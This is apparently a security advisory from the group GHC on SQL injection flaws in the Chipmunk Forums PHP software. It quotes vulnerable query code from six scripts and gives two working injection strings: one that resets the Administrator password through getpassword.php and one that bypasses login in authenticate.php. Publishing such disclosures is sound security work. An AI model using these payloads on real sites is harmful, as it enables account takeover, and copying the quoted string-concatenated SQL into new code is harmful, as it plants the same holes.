SQL injection in Chipmunk forums
/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/
[1] script name: getpassword.php
---[code]---
if(isset($_POST['submit']))
{
$email=$_POST['email'];
$getinfo="SELECT * from b_users where email='$email'";
...
mail("$email","Your Forum password","Your forum password has been set to
$value");
---[/code]---
[exploit]
ghc@xxxxxx' or username='Administrator
this action will change password for Administrator without notification
[note]
"Administrator" must be a valid user name.
[2] script name: authenticate.php
---[code]---
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from b_users where username='$username' and
password='$password' and
validated='1'";
---[/code]---
[exploit]
at login.php enter user name as
Administrator'/*
[3] script name: edit.php
---[code]---
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author
and
b_posts.ID='$ID'";
---[code]---
Possible SQL injection through $ID variable.
[4] search.php
---[code]---
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and
threadparent='0'
order by telapsed DESC limit $start, 50";
---[/code]---
Possible SQL injection through $searchterm.
[5] newtopic.php
---[code]---
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
...
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost, telapsed,
postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post',
'$day',
'$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");
---[/code]---
Possible SQL injection through $name, $title, $post.
[6] reguser.php
---[code 1]---
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT*from b_users where username='$username' or email='$email'";
---[code 2]---
if ($password==$pass2 && $_POST['password'])
{
...
$SQL ="INSERT into b_users (username,password,sig,
email,location,AIM,ICQ,showprofile,validated) values
('$username','$password','$signature','$email','$location','$aim','$icq','$showprofile','1')
";
mysql_query($SQL) or die(mysql_error());
---[/code]---
Possible SQL injection through registration form's variables.
Find a lot of bugs in usercp.php, reply.php, quote.php and others by yourself.
/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */